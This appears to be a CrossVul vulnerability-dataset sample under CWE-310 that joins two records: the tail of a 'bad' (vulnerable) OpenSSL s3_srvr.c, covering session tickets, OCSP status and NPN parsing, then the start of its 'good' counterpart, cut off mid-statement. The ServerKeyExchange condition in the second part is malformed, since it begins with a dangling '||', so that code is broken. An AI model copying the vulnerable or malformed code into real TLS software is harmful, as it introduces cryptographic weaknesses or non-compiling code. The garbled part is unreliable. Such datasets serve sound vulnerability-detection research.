#ifndef OPENSSL_NO_TLSEXT
/* send a new session ticket (not necessarily for a new session) */
int ssl3_send_newsession_ticket(SSL *s)
{
if (s->state == SSL3_ST_SW_SESSION_TICKET_A)
{
unsigned char *p, *senc, *macstart;
const unsigned char *const_p;
int len, slen_full, slen;
SSL_SESSION *sess;
unsigned int hlen;
EVP_CIPHER_CTX ctx;
HMAC_CTX hctx;
SSL_CTX *tctx = s->initial_ctx;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char key_name[16];
/* get session encoding length */
slen_full = i2d_SSL_SESSION(s->session, NULL);
/* Some length values are 16 bits, so forget it if session is
* too long
*/
if (slen_full > 0xFF00)
return -1;
senc = OPENSSL_malloc(slen_full);
if (!senc)
return -1;
p = senc;
i2d_SSL_SESSION(s->session, &p);
/* create a fresh copy (not shared with other threads) to clean up */
const_p = senc;
sess = d2i_SSL_SESSION(NULL, &const_p, slen_full);
if (sess == NULL)
{
OPENSSL_free(senc);
return -1;
}
sess->session_id_length = 0; /* ID is irrelevant for the ticket */
slen = i2d_SSL_SESSION(sess, NULL);
if (slen > slen_full) /* shouldn't ever happen */
{
OPENSSL_free(senc);
return -1;
}
p = senc;
i2d_SSL_SESSION(sess, &p);
SSL_SESSION_free(sess);
/*-
* Grow buffer if need be: the length calculation is as
* follows handshake_header_length +
* 4 (ticket lifetime hint) + 2 (ticket length) +
* 16 (key name) + max_iv_len (iv length) +
* session_length + max_enc_block_size (max encrypted session
* length) + max_md_size (HMAC).
*/
if (!BUF_MEM_grow(s->init_buf,
SSL_HM_HEADER_LENGTH(s) + 22 + EVP_MAX_IV_LENGTH +
EVP_MAX_BLOCK_LENGTH + EVP_MAX_MD_SIZE + slen))
return -1;
p = ssl_handshake_start(s);
EVP_CIPHER_CTX_init(&ctx);
HMAC_CTX_init(&hctx);
/* Initialize HMAC and cipher contexts. If callback present
* it does all the work otherwise use generated values
* from parent ctx.
*/
if (tctx->tlsext_ticket_key_cb)
{
if (tctx->tlsext_ticket_key_cb(s, key_name, iv, &ctx,
&hctx, 1) < 0)
{
OPENSSL_free(senc);
return -1;
}
}
else
{
RAND_pseudo_bytes(iv, 16);
EVP_EncryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL,
tctx->tlsext_tick_aes_key, iv);
HMAC_Init_ex(&hctx, tctx->tlsext_tick_hmac_key, 16,
tlsext_tick_md(), NULL);
memcpy(key_name, tctx->tlsext_tick_key_name, 16);
}
/* Ticket lifetime hint (advisory only):
* We leave this unspecified for resumed session (for simplicity),
* and guess that tickets for new sessions will live as long
* as their sessions. */
l2n(s->hit ? 0 : s->session->timeout, p);
/* Skip ticket length for now */
p += 2;
/* Output key name */
macstart = p;
memcpy(p, key_name, 16);
p += 16;
/* output IV */
memcpy(p, iv, EVP_CIPHER_CTX_iv_length(&ctx));
p += EVP_CIPHER_CTX_iv_length(&ctx);
/* Encrypt session data */
EVP_EncryptUpdate(&ctx, p, &len, senc, slen);
p += len;
EVP_EncryptFinal(&ctx, p, &len);
p += len;
EVP_CIPHER_CTX_cleanup(&ctx);
HMAC_Update(&hctx, macstart, p - macstart);
HMAC_Final(&hctx, p, &hlen);
HMAC_CTX_cleanup(&hctx);
p += hlen;
/* Now write out lengths: p points to end of data written */
/* Total length */
len = p - ssl_handshake_start(s);
ssl_set_handshake_header(s, SSL3_MT_NEWSESSION_TICKET, len);
/* Skip ticket lifetime hint */
p = ssl_handshake_start(s) + 4;
s2n(len - 6, p);
s->state=SSL3_ST_SW_SESSION_TICKET_B;
OPENSSL_free(senc);
}
/* SSL3_ST_SW_SESSION_TICKET_B */
return ssl_do_write(s);
}
int ssl3_send_cert_status(SSL *s)
{
if (s->state == SSL3_ST_SW_CERT_STATUS_A)
{
unsigned char *p;
/*-
* Grow buffer if need be: the length calculation is as
* follows 1 (message type) + 3 (message length) +
* 1 (ocsp response type) + 3 (ocsp response length)
* + (ocsp response)
*/
if (!BUF_MEM_grow(s->init_buf, 8 + s->tlsext_ocsp_resplen))
return -1;
p=(unsigned char *)s->init_buf->data;
/* do the header */
*(p++)=SSL3_MT_CERTIFICATE_STATUS;
/* message length */
l2n3(s->tlsext_ocsp_resplen + 4, p);
/* status type */
*(p++)= s->tlsext_status_type;
/* length of OCSP response */
l2n3(s->tlsext_ocsp_resplen, p);
/* actual response */
memcpy(p, s->tlsext_ocsp_resp, s->tlsext_ocsp_resplen);
/* number of bytes to write */
s->init_num = 8 + s->tlsext_ocsp_resplen;
s->state=SSL3_ST_SW_CERT_STATUS_B;
s->init_off = 0;
}
/* SSL3_ST_SW_CERT_STATUS_B */
return(ssl3_do_write(s,SSL3_RT_HANDSHAKE));
}
# ifndef OPENSSL_NO_NEXTPROTONEG
/* ssl3_get_next_proto reads a Next Protocol Negotiation handshake message. It
* sets the next_proto member in s if found */
int ssl3_get_next_proto(SSL *s)
{
int ok;
int proto_len, padding_len;
long n;
const unsigned char *p;
/* Clients cannot send a NextProtocol message if we didn't see the
* extension in their ClientHello */
if (!s->s3->next_proto_neg_seen)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION);
return -1;
}
n=s->method->ssl_get_message(s,
SSL3_ST_SR_NEXT_PROTO_A,
SSL3_ST_SR_NEXT_PROTO_B,
SSL3_MT_NEXT_PROTO,
514, /* See the payload format below */
&ok);
if (!ok)
return((int)n);
/* s->state doesn't reflect whether ChangeCipherSpec has been received
* in this handshake, but s->s3->change_cipher_spec does (will be reset
* by ssl3_get_finished). */
if (!s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS);
return -1;
}
if (n < 2)
return 0; /* The body must be > 1 bytes long */
p=(unsigned char *)s->init_msg;
/*-
* The payload looks like:
* uint8 proto_len;
* uint8 proto[proto_len];
* uint8 padding_len;
* uint8 padding[padding_len];
*/
proto_len = p[0];
if (proto_len + 2 > s->init_num)
return 0;
padding_len = p[proto_len + 1];
if (proto_len + padding_len + 2 != s->init_num)
return 0;
s->next_proto_negotiated = OPENSSL_malloc(proto_len);
if (!s->next_proto_negotiated)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,ERR_R_MALLOC_FAILURE);
return 0;
}
memcpy(s->next_proto_negotiated, p + 1, proto_len);
s->next_proto_negotiated_len = proto_len;
return 1;
}
# endif
#endif
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_1445_5 |
crossvul-cpp_data_good_1445_5 | /* ssl/s3_srvr.c -*- mode:C; c-file-style: "eay" -*- */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* ====================================================================
* Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
/* ====================================================================
* Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
*
* Portions of the attached software ("Contribution") are developed by
* SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
*
* The Contribution is licensed pursuant to the OpenSSL open source
* license provided above.
*
* ECC cipher suite support in OpenSSL originally written by
* Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
*
*/
/* ====================================================================
* Copyright 2005 Nokia. All rights reserved.
*
* The portions of the attached software ("Contribution") is developed by
* Nokia Corporation and is licensed pursuant to the OpenSSL open source
* license.
*
* The Contribution, originally written by Mika Kousa and Pasi Eronen of
* Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
* support (see RFC 4279) to OpenSSL.
*
* No patent licenses or other rights except those expressly stated in
* the OpenSSL open source license shall be deemed granted or received
* expressly, by implication, estoppel, or otherwise.
*
* No assurances are provided by Nokia that the Contribution does not
* infringe the patent or other intellectual property rights of any third
* party or that the license provides you with all the necessary rights
* to make use of the Contribution.
*
* THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
* ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
* SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
* OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
* OTHERWISE.
*/
#define REUSE_CIPHER_BUG
#define NETSCAPE_HANG_BUG
#include <stdio.h>
#include "ssl_locl.h"
#include "kssl_lcl.h"
#include "../crypto/constant_time_locl.h"
#include <openssl/buffer.h>
#include <openssl/rand.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/x509.h>
#ifndef OPENSSL_NO_DH
#include <openssl/dh.h>
#endif
#include <openssl/bn.h>
#ifndef OPENSSL_NO_KRB5
#include <openssl/krb5_asn.h>
#endif
#include <openssl/md5.h>
#ifndef OPENSSL_NO_SSL3_METHOD
static const SSL_METHOD *ssl3_get_server_method(int ver);
static const SSL_METHOD *ssl3_get_server_method(int ver)
{
if (ver == SSL3_VERSION)
return(SSLv3_server_method());
else
return(NULL);
}
IMPLEMENT_ssl3_meth_func(SSLv3_server_method,
ssl3_accept,
ssl_undefined_function,
ssl3_get_server_method)
#endif
#ifndef OPENSSL_NO_SRP
static int ssl_check_srp_ext_ClientHello(SSL *s, int *al)
{
int ret = SSL_ERROR_NONE;
*al = SSL_AD_UNRECOGNIZED_NAME;
if ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) &&
(s->srp_ctx.TLS_ext_srp_username_callback != NULL))
{
if(s->srp_ctx.login == NULL)
{
/* RFC 5054 says SHOULD reject,
we do so if There is no srp login name */
ret = SSL3_AL_FATAL;
*al = SSL_AD_UNKNOWN_PSK_IDENTITY;
}
else
{
ret = SSL_srp_server_param_with_username(s,al);
}
}
return ret;
}
#endif
int ssl3_accept(SSL *s)
{
BUF_MEM *buf;
unsigned long alg_k,Time=(unsigned long)time(NULL);
void (*cb)(const SSL *ssl,int type,int val)=NULL;
int ret= -1;
int new_state,state,skip=0;
RAND_add(&Time,sizeof(Time),0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb=s->info_callback;
else if (s->ctx->info_callback != NULL)
cb=s->ctx->info_callback;
/* init things to blank */
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s)) SSL_clear(s);
if (s->cert == NULL)
{
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_NO_CERTIFICATE_SET);
return(-1);
}
#ifndef OPENSSL_NO_HEARTBEATS
/* If we're awaiting a HeartbeatResponse, pretend we
* already got and don't await it anymore, because
* Heartbeats don't make sense during handshakes anyway.
*/
if (s->tlsext_hb_pending)
{
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
for (;;)
{
state=s->state;
switch (s->state)
{
case SSL_ST_RENEGOTIATE:
s->renegotiate=1;
/* s->state=SSL_ST_ACCEPT; */
case SSL_ST_BEFORE:
case SSL_ST_ACCEPT:
case SSL_ST_BEFORE|SSL_ST_ACCEPT:
case SSL_ST_OK|SSL_ST_ACCEPT:
s->server=1;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_START,1);
if ((s->version>>8) != 3)
{
SSLerr(SSL_F_SSL3_ACCEPT, ERR_R_INTERNAL_ERROR);
return -1;
}
if (!ssl_security(s, SSL_SECOP_VERSION, 0,
s->version, NULL))
{
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_VERSION_TOO_LOW);
return -1;
}
s->type=SSL_ST_ACCEPT;
if (s->init_buf == NULL)
{
if ((buf=BUF_MEM_new()) == NULL)
{
ret= -1;
goto end;
}
if (!BUF_MEM_grow(buf,SSL3_RT_MAX_PLAIN_LENGTH))
{
BUF_MEM_free(buf);
ret= -1;
goto end;
}
s->init_buf=buf;
}
if (!ssl3_setup_buffers(s))
{
ret= -1;
goto end;
}
s->init_num=0;
s->s3->flags &= ~TLS1_FLAGS_SKIP_CERT_VERIFY;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/* Should have been reset by ssl3_get_finished, too. */
s->s3->change_cipher_spec = 0;
if (s->state != SSL_ST_RENEGOTIATE)
{
/* Ok, we now need to push on a buffering BIO so that
* the output is sent in a way that TCP likes :-)
*/
if (!ssl_init_wbio_buffer(s,1)) { ret= -1; goto end; }
ssl3_init_finished_mac(s);
s->state=SSL3_ST_SR_CLNT_HELLO_A;
s->ctx->stats.sess_accept++;
}
else if (!s->s3->send_connection_binding &&
!(s->options & SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION))
{
/* Server attempting to renegotiate with
* client that doesn't support secure
* renegotiation.
*/
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_HANDSHAKE_FAILURE);
ret = -1;
goto end;
}
else
{
/* s->state == SSL_ST_RENEGOTIATE,
* we will just send a HelloRequest */
s->ctx->stats.sess_accept_renegotiate++;
s->state=SSL3_ST_SW_HELLO_REQ_A;
}
break;
case SSL3_ST_SW_HELLO_REQ_A:
case SSL3_ST_SW_HELLO_REQ_B:
s->shutdown=0;
ret=ssl3_send_hello_request(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SW_HELLO_REQ_C;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
ssl3_init_finished_mac(s);
break;
case SSL3_ST_SW_HELLO_REQ_C:
s->state=SSL_ST_OK;
break;
case SSL3_ST_SR_CLNT_HELLO_A:
case SSL3_ST_SR_CLNT_HELLO_B:
case SSL3_ST_SR_CLNT_HELLO_C:
ret=ssl3_get_client_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_SRP
s->state = SSL3_ST_SR_CLNT_HELLO_D;
case SSL3_ST_SR_CLNT_HELLO_D:
{
int al;
if ((ret = ssl_check_srp_ext_ClientHello(s,&al)) < 0)
{
/* callback indicates firther work to be done */
s->rwstate=SSL_X509_LOOKUP;
goto end;
}
if (ret != SSL_ERROR_NONE)
{
ssl3_send_alert(s,SSL3_AL_FATAL,al);
/* This is not really an error but the only means to
for a client to detect whether srp is supported. */
if (al != TLS1_AD_UNKNOWN_PSK_IDENTITY)
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_CLIENTHELLO_TLSEXT);
ret = SSL_TLSEXT_ERR_ALERT_FATAL;
ret= -1;
goto end;
}
}
#endif
s->renegotiate = 2;
s->state=SSL3_ST_SW_SRVR_HELLO_A;
s->init_num=0;
break;
case SSL3_ST_SW_SRVR_HELLO_A:
case SSL3_ST_SW_SRVR_HELLO_B:
ret=ssl3_send_server_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->hit)
{
if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
else
s->state=SSL3_ST_SW_CHANGE_A;
}
#else
if (s->hit)
s->state=SSL3_ST_SW_CHANGE_A;
#endif
else
s->state = SSL3_ST_SW_CERT_A;
s->init_num = 0;
break;
case SSL3_ST_SW_CERT_A:
case SSL3_ST_SW_CERT_B:
/* Check if it is anon DH or anon ECDH, */
/* normal PSK or KRB5 or SRP */
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aKRB5|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
ret=ssl3_send_server_certificate(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state=SSL3_ST_SW_CERT_STATUS_A;
else
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
else
{
skip = 1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
#else
}
else
skip=1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
#endif
s->init_num=0;
break;
case SSL3_ST_SW_KEY_EXCH_A:
case SSL3_ST_SW_KEY_EXCH_B:
alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
/*
* clear this, it may get reset by
* send_server_key_exchange
*/
s->s3->tmp.use_rsa_tmp=0;
/* only send if a DH key exchange, fortezza or
* RSA but we have a sign only certificate
*
* PSK: may send PSK identity hints
*
* For ECC ciphersuites, we send a serverKeyExchange
* message only if the cipher suite is either
* ECDH-anon or ECDHE. In other cases, the
* server certificate contains the server's
* public key for key exchange.
*/
if (
/* PSK: send ServerKeyExchange if PSK identity
* hint if provided */
#ifndef OPENSSL_NO_PSK
|| ((alg_k & SSL_kPSK) && s->ctx->psk_identity_hint)
#endif
#ifndef OPENSSL_NO_SRP
/* SRP: send ServerKeyExchange */
|| (alg_k & SSL_kSRP)
#endif
|| (alg_k & SSL_kDHE)
|| (alg_k & SSL_kECDHE)
|| ((alg_k & SSL_kRSA)
&& (s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL
|| (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher)
&& EVP_PKEY_size(s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)
)
)
)
)
{
ret=ssl3_send_server_key_exchange(s);
if (ret <= 0) goto end;
}
else
skip=1;
s->state=SSL3_ST_SW_CERT_REQ_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_REQ_A:
case SSL3_ST_SW_CERT_REQ_B:
if (/* don't request cert unless asked for it: */
!(s->verify_mode & SSL_VERIFY_PEER) ||
/* if SSL_VERIFY_CLIENT_ONCE is set,
* don't request cert during re-negotiation: */
((s->session->peer != NULL) &&
(s->verify_mode & SSL_VERIFY_CLIENT_ONCE)) ||
/* never request cert in anonymous ciphersuites
* (see section "Certificate request" in SSL 3 drafts
* and in RFC 2246): */
((s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) &&
/* ... except when the application insists on verification
* (against the specs, but s3_clnt.c accepts this for SSL 3) */
!(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) ||
/* never request cert in Kerberos ciphersuites */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) ||
/* don't request certificate for SRP auth */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aSRP)
/* With normal PSK Certificates and
* Certificate Requests are omitted */
|| (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
/* no cert request */
skip=1;
s->s3->tmp.cert_request=0;
s->state=SSL3_ST_SW_SRVR_DONE_A;
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
s->s3->tmp.cert_request=1;
ret=ssl3_send_certificate_request(s);
if (ret <= 0) goto end;
#ifndef NETSCAPE_HANG_BUG
s->state=SSL3_ST_SW_SRVR_DONE_A;
#else
s->state=SSL3_ST_SW_FLUSH;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
#endif
s->init_num=0;
}
break;
case SSL3_ST_SW_SRVR_DONE_A:
case SSL3_ST_SW_SRVR_DONE_B:
ret=ssl3_send_server_done(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
break;
case SSL3_ST_SW_FLUSH:
/* This code originally checked to see if
* any data was pending using BIO_CTRL_INFO
* and then flushed. This caused problems
* as documented in PR#1939. The proposed
* fix doesn't completely resolve this issue
* as buggy implementations of BIO_CTRL_PENDING
* still exist. So instead we just flush
* unconditionally.
*/
s->rwstate=SSL_WRITING;
if (BIO_flush(s->wbio) <= 0)
{
ret= -1;
goto end;
}
s->rwstate=SSL_NOTHING;
s->state=s->s3->tmp.next_state;
break;
case SSL3_ST_SR_CERT_A:
case SSL3_ST_SR_CERT_B:
if (s->s3->tmp.cert_request)
{
ret=ssl3_get_client_certificate(s);
if (ret <= 0) goto end;
}
s->init_num=0;
s->state=SSL3_ST_SR_KEY_EXCH_A;
break;
case SSL3_ST_SR_KEY_EXCH_A:
case SSL3_ST_SR_KEY_EXCH_B:
ret=ssl3_get_client_key_exchange(s);
if (ret <= 0)
goto end;
if (ret == 2)
{
/* For the ECDH ciphersuites when
* the client sends its ECDH pub key in
* a certificate, the CertificateVerify
* message is not sent.
* Also for GOST ciphersuites when
* the client uses its key from the certificate
* for key exchange.
*/
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num = 0;
}
else if (SSL_USE_SIGALGS(s))
{
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
if (!s->session->peer)
break;
/* For sigalgs freeze the handshake buffer
* at this point and digest cached records.
*/
if (!s->s3->handshake_buffer)
{
SSLerr(SSL_F_SSL3_ACCEPT,ERR_R_INTERNAL_ERROR);
return -1;
}
s->s3->flags |= TLS1_FLAGS_KEEP_HANDSHAKE;
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
int offset=0;
int dgst_num;
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
/* We need to get hashes here so if there is
* a client cert, it can be verified
* FIXME - digest processing for CertificateVerify
* should be generalized. But it is next step
*/
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
for (dgst_num=0; dgst_num<SSL_MAX_DIGEST;dgst_num++)
if (s->s3->handshake_dgst[dgst_num])
{
int dgst_size;
s->method->ssl3_enc->cert_verify_mac(s,EVP_MD_CTX_type(s->s3->handshake_dgst[dgst_num]),&(s->s3->tmp.cert_verify_md[offset]));
dgst_size=EVP_MD_CTX_size(s->s3->handshake_dgst[dgst_num]);
if (dgst_size < 0)
{
ret = -1;
goto end;
}
offset+=dgst_size;
}
}
break;
case SSL3_ST_SR_CERT_VRFY_A:
case SSL3_ST_SR_CERT_VRFY_B:
/*
* This *should* be the first time we enable CCS, but be
* extra careful about surrounding code changes. We need
* to set this here because we don't know if we're
* expecting a CertificateVerify or not.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
/* we should decide if we expected this one */
ret=ssl3_get_cert_verify(s);
if (ret <= 0) goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num=0;
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_SR_NEXT_PROTO_A:
case SSL3_ST_SR_NEXT_PROTO_B:
/*
* Enable CCS for resumed handshakes with NPN.
* In a full handshake with NPN, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so make
* sure not to re-enable it to ban duplicates.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_next_proto(s);
if (ret <= 0) goto end;
s->init_num = 0;
s->state=SSL3_ST_SR_FINISHED_A;
break;
#endif
case SSL3_ST_SR_FINISHED_A:
case SSL3_ST_SR_FINISHED_B:
/*
* Enable CCS for resumed handshakes without NPN.
* In a full handshake, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so make
* sure not to re-enable it to ban duplicates.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_finished(s,SSL3_ST_SR_FINISHED_A,
SSL3_ST_SR_FINISHED_B);
if (ret <= 0) goto end;
if (s->hit)
s->state=SSL_ST_OK;
#ifndef OPENSSL_NO_TLSEXT
else if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
#endif
else
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_SW_SESSION_TICKET_A:
case SSL3_ST_SW_SESSION_TICKET_B:
ret=ssl3_send_newsession_ticket(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_STATUS_A:
case SSL3_ST_SW_CERT_STATUS_B:
ret=ssl3_send_cert_status(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_KEY_EXCH_A;
s->init_num=0;
break;
#endif
case SSL3_ST_SW_CHANGE_A:
case SSL3_ST_SW_CHANGE_B:
s->session->cipher=s->s3->tmp.new_cipher;
if (!s->method->ssl3_enc->setup_key_block(s))
{ ret= -1; goto end; }
ret=ssl3_send_change_cipher_spec(s,
SSL3_ST_SW_CHANGE_A,SSL3_ST_SW_CHANGE_B);
